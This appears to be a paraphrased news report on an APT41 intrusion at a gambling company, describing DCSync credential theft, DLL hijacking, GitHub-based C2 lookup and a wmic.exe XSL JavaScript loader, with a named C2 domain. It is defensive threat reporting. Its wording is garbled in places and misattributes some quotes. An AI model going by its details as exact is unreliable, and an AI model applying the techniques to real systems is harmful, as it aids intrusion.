A prolific Chinese nation-state actor known as APT41 (aka Brass Typhoon, Earth Baku, Wicked Panda or Winnti) has been attributed to a sophisticated cyber attack targeting the gambling industry.
“For at least six months, the attackers secretly collected valuable information from the target company, including but not limited to network configurations, user passwords and LSASS process secrets,” said Ida Naor, the company’s co-founder and CEO. Israeli cyber security company Security Joes said in a statement general from The Hacker News.
“During the intrusion, the attackers continuously updated their toolset based on the security team’s response. As defenders watched, they changed their strategies and tools to evade detection and maintain constant access to the compromised network.”
The multi-stage attack, which targeted one customer and lasted nearly nine months this year, shows overlap with a set of intrusions tracked by cybersecurity vendor Sophos under the pseudonym Operation Raspberry Palace.
Naor said the company responded to the incident four months ago, adding that “these attacks depend on government-sponsored decision-makers. This time, we suspect with high confidence that APT41 was after financial gain.”
The company is designed with stealth in mind, using a variety of tactics to achieve its goals using a special toolkit that not only bypasses the security software installed in the environment, but also collects sensitive information and establishes covert channels for constant remote access.
Security Joes described APT41 as “highly skilled and methodical,” citing its ability to carry out espionage attacks as well as supply chain poisoning, leading to intellectual property theft and financially motivated intrusions such as ransomware and cryptocurrency mining.
The exact initial access vector used in the attack is currently unknown, but evidence leans towards phishing emails given the lack of active vulnerabilities in web-facing applications or supply chain breaches.
“Once inside the target infrastructure, the attackers launched a DCSync attack to collect password hashes of service and administrator accounts to expand their access,” the company said in a report. “With these credentials, they established persistence and maintained control over the network, focusing specifically on administrator and developer accounts.”
The attackers are said to have methodically conducted reconnaissance and post-exploitation activities, often customizing their toolset in response to steps taken to counter the threat and escalate their privileges with the ultimate goal of downloading and executing additional payloads.
Some of techniques are used to realize their goals include Phantom DLL Hijacking and using the legitimate wmic.exe utility, not to mention abusing their access to work accounts with administrative rights to run the execution.
The next stage is a malicious DLL file called TSVIPSrv.dll that is extracted over the SMB protocol, after which the payload establishes contact with a hard-coded Command and Control (C2) server.
“When the hard-coded C2 fails, the implant attempts to update its C2 information by scanning GitHub users using the following URL: github(.)com/search?o=desc&q=pointers&s=joined&type=Users&.”
“The malware parses HTML received from a GitHub request, looking for sequences of capitalized words separated only by spaces. It collects eight of those words, then extracts only the capital letters between A and P. This process creates an 8-character string that encodes the IP address of the new C2 server that will be used in the attack.”
The initial contact with the C2 server paves the way for the infected system to be profiled and more malware to be launched over the socket connection.
Security’s Joes said the threat actors kept quiet for several weeks after their activity was discovered, but eventually returned with an updated approach to executing highly obfuscated JavaScript code contained in a modified version of an XSL file (“texttable.xsl “) using LOLBIN wmic.exe.
“Once the WMIC.exe MEMORYCHIP GET command is run, it indirectly loads the texttable.xsl file to format the output, forcing the execution of malicious JavaScript code injected by the attacker,” the researchers explained.
JavaScript, on the other hand, serves as a loader that uses the time.qnapntp(.)com domain as a C2 server to retrieve the following payload, which fingerprints the machine and sends the information back to the server subject to some filtering. criteria that likely serve to target only those machines of interest to the threat actor.
“What really stands out about the code is the deliberate targeting of machines with IP addresses containing the substring ‘10.20.22,’” the researchers said. “
“This highlights which specific devices are valuable to an attacker, namely devices on subnets 10.20.22(0-9).(0-255). By correlating this information with network logs and the IP addresses of the devices on which the file was detected, we concluded that the attacker used this filtering mechanism to ensure that only devices on the VPN subnet were affected.”
